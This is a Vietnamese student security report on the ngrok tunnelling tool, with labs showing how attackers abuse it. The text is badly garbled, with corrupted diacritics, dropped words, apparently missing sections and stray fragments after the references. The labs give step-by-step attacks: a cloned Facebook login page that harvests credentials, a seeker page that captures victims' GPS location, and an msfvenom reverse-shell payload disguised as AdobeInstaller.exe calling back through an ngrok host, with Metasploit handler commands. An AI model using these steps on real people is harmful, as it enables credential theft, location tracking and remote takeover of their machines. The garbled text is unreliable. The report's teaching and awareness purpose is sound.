HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THÔNG TIN I - - Học Phần: AN TỒN MẠNG Báo Cáo: Tìm hiểu cơng cụ ngrok Kali Tools Giảng viên hướng dẫn: TS Đặng Minh Tuấn Nhóm mơn học: 01 Sinh viên thực hiện: Nguyễn Công Hiếu Mã sinh viên: B18DCAT086 Hà Nội, tháng 12 năm 2021 MỤC LỤC MỤC LỤC LỜI NÓI ĐẦU DANH MỤC CÁC HÌNH ẢNH DANH MỤC CÁC BẢNG DANH SÁCH CÁC THUẬT NGỮ CHƯƠNG 1: GIỚI THIỆU VỀ CÔNG CỤ NGROK Lịch sử hình thành [1] 1.1 Công cụ ngrok đời nào? 1.2 Tại ngrok lại thành công? Giới thiệu công cụ ngrok [2] 2.1 Khái niệm 2.2 Các tính ngrok 2.3 Một số ứng dụng ngrok Tại lại sử ngrok xếp mục Exploitation Tools Kali Tools? CHƯƠNG 2: HƯỚNG DẪN CÀI ĐẶT VÀ SỬ DỤNG CÔNG CỤ NGROK [3] 11 Hướng dẫn cài đặt ngrok máy Windows Linux 11 1.1 Cài ngrok Windows 11 1.2 Cài ngrok Linux 12 Hướng dẫn sử dụng công cụ ngrok 13 2.1 Hướng dẫn lưu authtoken vào tệp cấu hình 13 2.2 Hướng dẫn khởi động HTTP tunnel 14 2.3 Hướng dẫn khởi động TCP tunnel 15 2.4 Hướng dẫn khởi động đường hầm tệp cấu hình 16 2.5 Hướng dẫn cập nhật ngrok phiên 17 2.6 Hướng dẫn sử dụng nâng cao 18 CHƯƠNG 3: MỘT SỐ BÀI LAB SỬ DỤNG NGROK 20 LAB 1: Phishing ngrok 20 1.1 Giới thiệu 20 1.2 LAB 1.1: ngrok + setoolkit 20 1.3 LAB 1.2: ngrok + seeker 26 LAB 2: Tấn công chiếm quyền điều khiển thiết bị từ xa 28 2.1 Giới thiệu 28 2.2 Lab 2: ngrok + Metasploit Framework 29 CHƯƠNG 4: ĐÁNH GIÁ VÀ KẾT LUẬN 32 Đánh giá công cụ ngrok an toàn mạng 32 Kết luận 33 TÀI LIỆU THAM KHẢO 35 LỜI NÓI ĐẦU Nhờ phát triển Internet khiến cho kết nối với bỏ qua khoảng cách địa lý, nhờ tốc độ Internet ngày cải thiện khiến cho việc phát triển công nghệ trở nên dễ dàng công nghệ ngày trở nên suốt thân thiện với người dùng địi hỏi người dùng khơng cần q nhiều kiến thức tin học sử dụng Nhưng mặt trái việc phát triển tin tặc lợi dụng phát triển để thực khai thác nhắm đến người dùng hiểu biết tin học Để hiểu mánh khóe tin tặc việc khai thác thông tin người dùng em chọn nghiên cứu công cụ ngrok công cụ với mục đích tốt đẹp để thử nghiệm sản phẩm mạng trở thành công cụ cho tin tặc tiếp cận đến người dùng hiểu biết Trong báo cáo ta tìm hiểu lịch sử hình thành phát triển cơng cụ ngrok, giới thiệu tính ứng dụng ngrok, hướng dẫn cài đặt sử dụng công cụ ngrok, số lab thấy cách tin tặc lạm dụng công cụ cuối đánh giá kết luận công cụ Trong báo cáo đề cập đến tính miễn phí cơng cụ ngrok sâu vào tính mà tin tặc thường lạm dụng lạm dụng Cuối em xin gửi lời cảm ơn đến TS Đặng Minh Tuấn giúp đỡ em kiến thức môn An tồn mạng lớp để em hồn thành báo cáo Hà Nội, tháng 12 năm 2021 An tồn mạng – Nhóm – D18 Nguyễn Cơng Hiếu DANH MỤC CÁC HÌNH ẢNH Hình 1.1 Mô tả ngrok GitHub [2] Hình 2.1 Tải ZIP ngrok trang chủ ngrok 11 Hình 2.2 Hình ảnh khởi động ngrok.exe 12 Hình 2.3 Tải TGZ ngrok trang chủ ngrok 13 Hình 2.4 Lấy authtoken dashboard ngrok 14 Hình 2.5 Tệp cấu hình ngrok.yml 16 Hình 3.1 Cơng cụ setoolkit seeker 20 Hình 3.2 Kết chạy lệnh ngrok http 80 21 Hình 3.3 Chụp hình cơng cụ setoolkit 22 Hình 3.4 Chụp hình công cụ setoolkit 22 Hình 3.5 Chụp hình cơng cụ setoolkit 23 Hình 3.6 Chụp hình setoolkit 23 Hình 3.7 Chụp hình setoolkit 24 Hình 3.8 Kết chép trang www.facebook.com 24 Hình 3.9 Truy cập đăng nhập facebook giả mạo thiết bị khác 25 Hình 3.10 Thơng tin tài khoản facebook lấy 25 Hình 3.11 Chụp hình seeker 26 Hình 3.12 Kết chạy lệnh ngrok http 8080 27 Hình 3.13 Nạn nhân xin cấp quyền truy cập drive cho phép lấy thông tin GPS 27 Hình 3.14 Thơng tin thiết bị tọa độ ta lấy từ máy nạn nhân 28 Hình 3.15 Tọa độ nạn nhân Google Map 28 Hình 3.16 Chụp hình file ~/.ngrok2/ngrok.yml 29 Hình 3.17 Kết lệnh ngrok start all 29 Hình 3.18 Tạo mã độc msfvenom 29 Hình 3.19 Nạn nhân tải phần mềm độc hại qua ngrok 30 Hình 3.20 Đã có kết nối 30 Hình 3.21 Thực lệnh screenshot máy nạn nhân 31 Hình 3.22 Ảnh chụp hình lưu máy kẻ cơng 31 Hình 4.1 Google cảnh báo trang web có tên miền phụ ngrok.io 33 DANH MỤC CÁC BẢNG Bảng 2.1 Tùy chọn lệnh authtoken 14 Bảng 2.2 Tùy chọn lệnh http 15 Bảng 2.3 Ví dụ sử dụng lệnh http 15 Bảng 2.4 Tùy chọn lệnh tcp 16 Bảng 2.5 Tùy chọn lệnh start 17 Bảng 2.6 Ví dụ sử dụng lệnh start 17 Bảng 2.7 Tùy chọn lệnh update 17 Bảng 2.8 Ví dụ sử dụng lệnh update 18 Bảng 2.9 In số thông tin ngrok 18 Bảng 2.10 Tùy chọn lệnh ngrok miễn phí 18 DANH SÁCH CÁC THUẬT NGỮ Ý nghĩa Là công ty Amazon cung cấp tảng điện toán đám mây Hồ sơ ứng tuyển Tường lửa hệ thống an ninh mạng, dựa phần cứng phần mềm, sử dụng quy tắc để kiểm soát traffic vào, Firewall khỏi hệ thống Git Git phần mềm quản lý mã nguồn phân tán Là dịch vụ cung cấp kho lưu trữ mã nguồn Git dựa GitHub web cho dự án phát triển phần mềm Là phần mềm lập trình để thi thời gian giới Hackathon hạn ngắn Giao thức truyền tải siêu văn giao thức lớp ứng dụng HTTP (Hypertext Transfer cho hệ thống thông tin siêu phương tiện phân tán, cộng tác Protocol) sử dụng mạng toàn cầu - World Wide Web HTTP Callback Là hàm gọi có kiện diễn Yêu cầu HTTP thông tin từ client gửi đến server, yêu cầu server HTTP request làm việc HTTP response Phản hồi HTTP thông tin từ server gửi đến cho client Là "loại công cụ" cung cấp đường hầm (tunnel) liên kết LocalTunnel localhost bạn mạng internet để bạn truy cập vào localhost giống server bình thường Biên dịch địa mạng mạng máy tính q trình thay đổi NAT (Network Address thơng tin địa IP gói tin truyền qua thiết bị Translation) định tuyến Tấn cơng giả mạo lĩnh vực bảo mật máy tính, hành vi Phishing giả mạo ác ý nhằm lấy thông tin nhạy cảm PSTN ((Public Switched Mạng điện thoại chuyển mạch công cộng mạng điện thoại cố Telephone Network) định (để bàn) có dây dẫn Giao thức điều khiển truyền vận giao thức mạng quan trọng TCP (Transmission sử dụng việc truyền liệu qua mạng TCP Control Protocol) giao thức hướng kết nối Đường hầm giao thức cho phép di chuyển an toàn liệu tunnel từ mạng sang mạng khác Là dịch vụ cho phép bạn xây dựng ứng dụng liên quan đến việc Twilio gửi nhận tin nhắn gọi điện thoại URL (Uniform Resource Định vị tài nguyên thống nhất: Cụ thể, URL địa tài Locator) nguyên Web máy tính cá nhân Là tính cho phép website tự động thông báo gửi webhooks liệu thời gian thực đến hệ thống có kiện phát sinh website Thuật ngữ AWS (Amazon Web Services) CV (curriculum vitae) CHƯƠNG 1: GIỚI THIỆU VỀ CÔNG CỤ NGROK Lịch sử hình thành [1] 1.1 Cơng cụ ngrok đời nào? Các lập trình viên thường ln phải cập nhật kiến thức công nghệ để không bị tụt hậu với phát triển nhanh cơng nghệ Ngơn ngữ lập trình kiến thức cần phải cập nhật, học ngôn ngữ lập trình cịn giúp lập trình viên dễ tiếp cận với nhiều mảng màu công nghệ (như C/C++ tiếp xúc với mảng lập trình nhúng, PHP tiếp xúc nhiều với mảng lập trình web) Khơng vậy, việc có nhiều ngơn ngữ lập trình CV giúp lập trình viên tiếp cận với nhiều cơng việc với mức lương cao Với Alan Shreve vậy, anh muốn học ngơn ngữ lập trình Go cách để anh ý tiếp cận với ngôn ngữ lập trình sản phẩm mã nguồn mở hoàn chỉnh sử dụng sản phẩm phần sơ yếu lý lịch công khai mà anh dùng để xin việc sau Ban đầu, sản phẩm anh muốn tạo sản phẩm giúp phát triển ứng dụng webhooks cách dễ dàng Tuy nhiên sản phẩm thực chất sản phẩm xây dựng hoàn chỉnh trước LocalTunnel Alan hỏi ý kiến nhà phát triển sản phẩm để anh sử dụng ngơn ngữ Go để lập trình lại sản phẩm theo anh “Chuyển dự án có sẵn cách tuyệt với để học ngôn ngữ mới” Anh đưa dự án Go lên GitHub cơng khai lần đầu vào năm 2013 gọi ngrok Hình 1.1 Mơ tả ngrok GitHub [2] Trong Alan xây dựng ứng dụng Twilio thử sử dụng cách dùng điện thoại để gọi đến số Twilio, nhiên thứ anh nhận lại tin nhắn “An application error has occurred” nhật ký phần mềm nghĩa “đã xảy lỗi ứng dụng” Khi anh nhận nhiều bước trung gian để gọi đến ứng dụng anh ý: “Tơi nhận bắt đầu kết nối âm thanh/tín hiệu tới tháp di động truyền qua PSTN thông qua nhiều nhà cung cấp đến trung tâm liệu Twilio, nơi thực HTTP request đến dịch vụ đường hầm (tunnel service) tơi sau gửi qua dịch vụ cục tơi Đó HTTP request thực sự, thực đắt tiền.” Alan có suy nghĩ thay lần gọi phải quay số lần để tạo HTTP request đắt tiền không sử dụng lại HTTP request cũ Với cơng cụ ngrok, Alan xem tất tham số HTTP request sử dụng để phát lại thay phải quay số để sinh HTTP request 1.2 Tại ngrok lại thành công? Ngày nay, 40000 nhà phát triển sử dụng ngrok Đây công cụ hữu ích để sử dụng bạn phát triển ứng dụng Nhưng Alan gần không xây dựng ứng dụng mà chuyển đổi từ ứng dụng có LocalTunnel sang ngơn ngữ Go LocalTunnel sử dụng rộng rãi Tuy nhiên, khao khát học ngơn ngữ lập trình Go Alan đưa anh đến với đường tạo ngrok thay tạo sản phẩm có tính thương mại hóa Việc ưu tiên sử dụng bên thứ ba để phát triển web dễ dàng khiến cho ngrok trở thành phương án phù hợp mạnh mẽ Điều không xảy cách tình cờ, Alan nhận phản hồi từ nhà phát triển sử dụng ngrok, người hỏi đồng nghiệp xem họ nghĩ đóng góp ngrok với cộng đồng Go (The Go Community) Chính nhờ phản hồi đóng góp cộng đồng Go mà ngrok trở nên vô thành công Alan cho biết: “Thành công ngrok với tư cách dự án nhờ phần không nhỏ vào việc chọn Go làm ngôn ngữ triển khai.” Nếu khơng có cộng đồng Go, ngrok khơng có ngày hơm HTTP request có thêm vài vịng cần qua trước chúng đến local tunnel bạn Ngoài cộng đồng Go thành công ngrok ảnh hưởng cộng đồng SIGNAL (The SIGNAL Community) - cộng đồng phát triển ứng dụng Twillio Vào năm 2016, Alan Shreve có buổi tọa đàm để nói đời ngrok giới thiệu dịch vụ ngrok hội thảo EQUIP Twilio Từ đưa ngrok đến với nhiều người dùng Giới thiệu công cụ ngrok [2] 2.1 Khái niệm Công cụ ngrok phần mềm mã nguồn mở Alan Shreve phát triển sử dụng phần lớn ngơn ngữ lập trình Go JavaScript Công cụ ngrok reverse proxy tạo tunnel an toàn từ public endpoint đến web service chạy cục Công cụ ngrok nắm bắt phân tích tất lưu lượng qua tunnel để kiểm tra phát lại sau 2.2 Các tính ngrok Đưa dịch vụ HTTP sau NAT tường lửa (firewall) lên Internet với tên miền phụ (subdomain) ngrok.com Đưa dịch vụ TCP sau NAT tường lửa (firewall) lên Internet cổng ngẫu nhiên ngrok.com Kiểm tra tất yêu cầu/phản hồi HTTP truyền qua tunnel Phát lại yêu cầu truyền qua tunnel 2.3 Một số ứng dụng ngrok Chia sẻ tạm thời trang web chạy máy nhà phát triển Demo ứng dụng hackathon mà không cần triển khai Phát triển dịch vụ sử dụng webhook (HTTP callbacks) cách cho phép bạn phát lại yêu cầu Gỡ lỗi hiểu dịch vụ web cách kiểm tra lưu lượng HTTP Chạy dịch vụ nối mạng máy bị tắt tường lửa khỏi internet Tại lại sử ngrok xếp mục Exploitation Tools Kali Tools? Exploitation Tools (công cụ khai thác): Là phần mềm máy tính để thực công, khai thác xâm nhập vào lỗ hổng, điểm yếu hệ thống máy tính Một số Exploitation Tools phổ biến Kali Tools là: ngrok, Metasploit, Armitage, … Tuy mục đích tạo ngrok Alan Shreve khơng có chút liên quan đến việc khai thác điểm yếu lỗ hổng hay công ngrok xếp mục Explotation Tools Kali Tools lý sau Thứ nhất, công mạng dựa ngrok khó bị phát chúng sử dụng tên miền phụ ngẫu nhiên ngrok.com, bên cạnh việc vượt qua thiết bị bảo mật tường lửa, khiến trở thành mục tiêu hoạt động tội phạm mạng Thứ hai, ngrok dễ dàng đưa trang web từ máy chủ cục lên Internet tức trang Phishing lừa đảo Hình 3.2 Kết chạy lệnh ngrok http 80 Tiếp đến cần tạo trang giả mạo Trong máy Kali Linux công cụ setoolkit cài đặt sẵn cần dùng lệnh sudo setoolkit để chạy phần mềm phần mềm Các bước tạo trang web giả mạo sau: - Bước 1: Vào terminal Kali Linux nhập: sudo setoolkit - Bước 2: Các lựa chọn setoolkit lên Hình 3.3: nhập tùy chọn - Bước 3: Các lựa chọn Social-Engineering Attacks lên Hình 3.4: nhập tùy chọn - Bước 4: Các lựa chọn Website Attack Vectors lên Hình 3.5: nhập tùy chọn - Bước 5: Các lựa chọn Credential Harvester Attack Method lên Hình 3.6: nhập tùy chọn - Bước 6: Nhập đường dẫn http ngrok nhập website cần nhân lab sử dụng www.facebook.com kết Hình 3.7 Sau thực bước ta thành công nhân website đăng nhập www.facebook.com chạy localhost cổng 80 kết Hình 3.8 21 Hình 3.3 Chụp hình cơng cụ setoolkit Hình 3.4 Chụp hình cơng cụ setoolkit 22 Hình 3.5 Chụp hình cơng cụ setoolkit Hình 3.6 Chụp hình setoolkit 23 Hình 3.7 Chụp hình setoolkit Hình 3.8 Kết chép trang www.facebook.com Tiếp theo ta thực truy cập đường dẫn http ngrok đăng nhập (Hình 3.9) phía bên setoolkit ghi lại nhật ký truy cập thông tin email password (Hình 3.10) 24 Hình 3.9 Truy cập đăng nhập facebook giả mạo thiết bị khác Hình 3.10 Thơng tin tài khoản facebook lấy 25 1.3 LAB 1.2: ngrok + seeker Giới thiệu seeker, công cụ tạo website giả mạo sử dụng tính trình duyệt để lấy thơng tin tọa độ thiết bị Có thể tải seeker cài theo hướng dẫn GitHub: https://github.com/thewhiteh4t/seeker.git Để tạo trang giả mạo seeker ta thực bước sau: - Bước 1: Vào terminal Kali Linux thư mục seeker nhập: python3 seeker.py -t manual - Bước 2: Các tùy chọn seeker nhập: - Bước 3: Nhập link google drive bạn (một link google drive hình ảnh file phương tiên …) kết Hình 3.11 - Bước 4: Vào terminal Kali Linux nhập lệnh: ngrok http 8080 (8080 seeker dùng) ta đường dẫn Hình 3.12 Ta gửi đường dẫn ngrok cho nạn nhân nạn nhân xin cấp quyền truy cập cho phép sử dụng GPS (Hình 3.13.) kết ta thu tọa độ máy nạn nhân (Hình 3.14.) truy cập Google Maps để xem rõ tọa độ đồ (Hình 3.15) Hình 3.11 Chụp hình seeker 26 Hình 3.12 Kết chạy lệnh ngrok http 8080 Hình 3.13 Nạn nhân xin cấp quyền truy cập drive cho phép lấy thông tin GPS 27 Hình 3.14 Thơng tin thiết bị tọa độ ta lấy từ máy nạn nhân Hình 3.15 Tọa độ nạn nhân Google Map LAB 2: Tấn công chiếm quyền điều khiển thiết bị từ xa 2.1 Giới thiệu Ngoài http tunnel ngrok ta lạm dụng tcp tunnel để sử dụng chuyển tiếp cổng (Port Forwarding) nhờ điều khiển máy nạn nhân qua Internet thay 28 mạng nội Bản thân http tunnel ngrok ta lạm dụng để trở thành nơi phân tán mã độ Trong LAB ta dùng Metasploit để tạo mã độc điều khiển từ xa dùng ngrok để phân phối chương trình qua Internet 2.2 Lab 2: ngrok + Metasploit Framework Công cụ ngrok Lab có vai trị Một làm công cụ để phân tán mã độc đến nạn nhân Hai cổng để máy nạn nhân kết nối đến kẻ cơng kết nối đến để điều khiển máy nạn nhân Để thực việc trước hết ta phải sửa lại tệp cấu hình đường dẫn ~/.ngrok2/ngrok.yml Hình 3.16 Hình 3.16 Chụp hình file ~/.ngrok2/ngrok.yml Chạy ngrok lệnh ngrok start all Kết ta đường dẫn Hình 3.17 đường dẫn http đến cổng 80, https đến cổng 80 tcp đến cổng 1234 đường dẫn tcp có số hiệu cổng (trong hình 12388) Hình 3.17 Kết lệnh ngrok start all Tiếp đến ta cần tạo mã độc lệnh sau: msfvenom -p windows/shell/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=12388 -f exe > AdobeInstaller.exe (trong giá trị LHOST địa tcp ngrok, LPORT port tcp ngrok tên chương trình đặt ngẫu nhiên có exe Lab đặt tên AdobeInstaller.exe) Hình 3.18 Tạo mã độc msfvenom 29 Sau tạo xong mã độc ta chuyển vị trí mã độc đến địa /var/www/html/ máy Kali Linux chạy Apache lệnh: service apache2 start lúc ta phân tán mã độc đường dẫn http Hình 3.19 Nạn nhân tải phần mềm độc hại qua ngrok Tiếp tục ta cần khởi độc Metasploit Framework bắt đầu khai thác sau: - Bước 1: Vào terminal Kali Linux chạy lệnh: sudo msfconsole - Bước 2: msf> use multi/handler - Bước 3: msf> set LHOST 0.0.0.0 - Bước 4: msf> set LPORT 1234 (chú thích: 1234 cổng TCP file cấu hình) - Bước 5: msf> set payload windows/meterpreter/reverse_tcp - Bước 6: msf> exploit Cuối đợi cho nạn nhân chạy mã độc tải kết Hình 3.20 Hình 3.20 Đã có kết nối 30 Ta thực lệnh shell máy điều khiển từ xa ví dụ lệnh screenshot (Hình 3.21 Hình 3.22) Hình 3.21 Thực lệnh screenshot máy nạn nhân Hình 3.22 Ảnh chụp hình lưu máy kẻ cơng 31 CHƯƠNG 4: ĐÁNH GIÁ VÀ KẾT LUẬN Đánh giá cơng cụ ngrok an tồn mạng Mặc dù công cụ ngrok tạo nhằm phục vụ cho nhu cầu phát triển ứng dụng qua mạng nhờ tính tunnel mà việc phát triển triển khai ứng dụng demo trở nên dễ dàng giảm thiểu chi phí Tuy nhiên tính cơng cụ khiến cho việc quản lý ứng dụng chạy ngrok trở nên khó khăn ngrok trở thành công cụ bị tin tặc lạm dụng nhiều để đưa ứng dụng độc hại qua Internet Ưu điểm ngrok khiến cho tin tặc lựa chọn: - Sử dụng ngrok tiết kiệm chi phí: kẻ cơng khơng phải bỏ tiền để có server nhằm đưa website giả mạo lên - Khó bị phát hiện: http tunnel ngrok cho url random nên việc phát người tạo trang web giả mạo phát tán khó xuất biến cách gần ngẫu nhiên khó truy ngược từ địa ngrok - Dễ dàng đưa ứng dụng lên internet: cần dòng lệnh web giả mạo kẻ xấu đưa lên mạng mà không cần phải cấu hình lằng nhằng rắc rối so với hosting miễn phí khác việc đưa website lên internet khó khăn kiểm duyệt vơ gắt gao ngrok lại gần không kiểm duyệt mà người dùng đưa lên Nhược điểm ngrok - URL dễ bị phát giả mạo: ngrok cấp cho đường dẫn tên miền phụ ngrok.io trước dãy số hexa dài người dùng dễ dàng nhận trang web giả mạo (có thể khắc phục sử dụng tính phí sử dụng thêm tính subdomain cho ta tự thay đổi tên miền phụ thay dãy số hexa) - Các trang web có tên miền phụ ngrok.io thường bị trình duyệt lọc gắt gao so với trang web khác điển trình duyệt Chrome google ln cảnh cáo chặn truy cập trang web tên miền phụ ngrok.io điều khiến người dùng cảnh giác (Các trình duyệt khác Microsoft Edge, Mozilla Firefox, Cốc Cốc, Opera, … khơng có cảnh báo truy cập) 32 Hình 4.1 Google cảnh báo trang web có tên miền phụ ngrok.io Kết luận So với ứng dụng khai thác Kali tools ngrok khơng thực có tính phục vụ cho cơng tìm kiếm hay khai thác lỗ hổng tạo dựng trang web lừa đảo khai thác người dùng Nhưng khả đưa ứng dụng lên Internet nên thân ngrok công cụ phối hợp tốt với công cụ công cần kết nối mạng cục để thực công qua Internet dễ dàng đưa trang web lừa đảo từ localhost lên Internet Khơng việc sử dụng ngrok cịn khiến cho tin tặc khó bị phát nên tin tặc tin dùng để phân tán mã độc, thực công giá mạo, công qua mạng Internet khác Với người dùng, tránh truy cập URL lạ tránh tải, cài đặt chạy phần mềm không rõ nguồn gốc phải để máy tính chạy có phần mềm chống phần mềm độc hại; để ý đường dẫn trang web trước cung cấp thông tin quyền truy cập phần cứng, quyền riêng tư thông tin nhạy cảm 33 Với nhà phát triển, ngrok cơng cụ giúp nhà phát triển đưa sản phẩm thử nghiệm lên Internet trước triển lên máy chủ Tuy nhiên đường dẫn ngrok công khai nên tin tặc cơng vào máy tính nhà phát triển họ để lộ đường dẫn ứng dụng thử nghiệm thường cịn nhiều lỗ hổng khai thác Cho nên nhà phát triển cần tránh để lộ đường dẫn ngrok nên sử dụng chế auth để thiết lập username:password trước truy cập ứng dụng 34 TÀI LIỆU THAM KHẢO [1] Kyle Kelly-Yahner, “One HTTP Request From Stardom: How Alan Shreve Built ngrok Using Go” , 2016 Truy xuất từ: https://www.twilio.com/blog/2016/02/howalan-shreve-built-ngrok-with-go.html [2] Alan Shreve, “ngrok – Introspected tunnels to localhost”, 2015 Truy xuất từ: https://github.com/inconshreveable/ngrok ngrok, “ngrok – documentation” Truy xuất từ: https://ngrok.com/docs [3] 35 ... dụng công cụ ngrok Trong phần hướng dẫn hướng dẫn tính miễn phí cơng cụ ngrok Để tìm hiểu thêm tính nâng cao cần phải trả phí ta tìm hiểu thêm tài liệu thức từ trang chủ ngrok: https:/ /ngrok. com/docs... dùng hiểu biết Trong báo cáo ta tìm hiểu lịch sử hình thành phát triển cơng cụ ngrok, giới thiệu tính ứng dụng ngrok, hướng dẫn cài đặt sử dụng công cụ ngrok, số lab thấy cách tin tặc lạm dụng công. .. trang web lừa đảo khai thác người dùng Nhưng khả đưa ứng dụng lên Internet nên thân ngrok công cụ phối hợp tốt với công cụ công cần kết nối mạng cục để thực công qua Internet dễ dàng đưa trang